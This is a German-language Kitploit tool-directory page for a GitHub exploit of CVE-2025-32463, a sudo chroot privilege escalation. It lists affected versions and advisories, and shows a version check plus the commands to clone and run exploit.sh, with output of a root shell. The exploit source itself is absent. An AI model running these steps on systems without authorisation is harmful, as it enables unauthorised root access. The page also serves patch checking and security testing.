Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32463 — Dies ist der Exploit für CVE-2025-32463 | Kitploit
Tools/GitHubGitHub/rajneeshkarya/cve-2025-32463
Privilege EscalationSchwachstellenanalyseExploitationPost-ExploitationPenetrationstestsRed Teaming
GitHubrajneeshkarya/cve-2025-32463

CVE-2025-32463

Dies ist der Exploit für CVE-2025-32463

Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-32463 Exploit

Dies ist der Exploit für CVE-2025-32463

  • Danke an Rich Mirch (@0xm1rch auf X) bei Stratascale für die Meldung dieser erstaunlichen Schwachstelle.
  • Originalbeitrag: Sicherheitshinweis: Sudo-chroot-Privilegienerweiterung
  • NVD: CVE-2025-32463 (CVSS 9.3)

Betroffene Versionen

Betroffen sind anfällige Builds von sudo 1.9.14 bis 1.9.17 (alle p-Revisionen) auf den meisten Linux-Distributionen.

Sicherheitsseiten

  • Ubuntu (CVSS 9.3)
  • Redhat (CVSS 7.8)
  • SUSE (CVSS 7.8)
  • Debian

Schneller Schwachstellencheck

root@kitploit:~
# Vulnerable sudo will give you this
kairaj5456 ~ $ sudo -R fake_root fake_root
sudo: fake_root: No such file or directory

# Patched sudo will give you this
kairaj5456 ~ $ sudo -R fake_root fake_root
[sudo] password for kairaj5456:
sudo: you are not permitted to use the -R option with fake_root

Testen des Exploits

root@kitploit:~
$ git clone https://github.com/Rajneeshkarya/CVE-2025-32463.git

$ cd CVE-2025-32463

$ chmod +x exploit.sh

$ ./exploit.sh

[+] Launching exploit via sudo...

# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),117(bluetooth),121(wireshark),129(scanner),136(kaboxer),1000(kairaj5456)

Zum Verständnis der Schwachstelle

Schauen Sie sich den ursprünglichen Blogbeitrag von Rich Mirch an – hier klicken

Tool herunterladen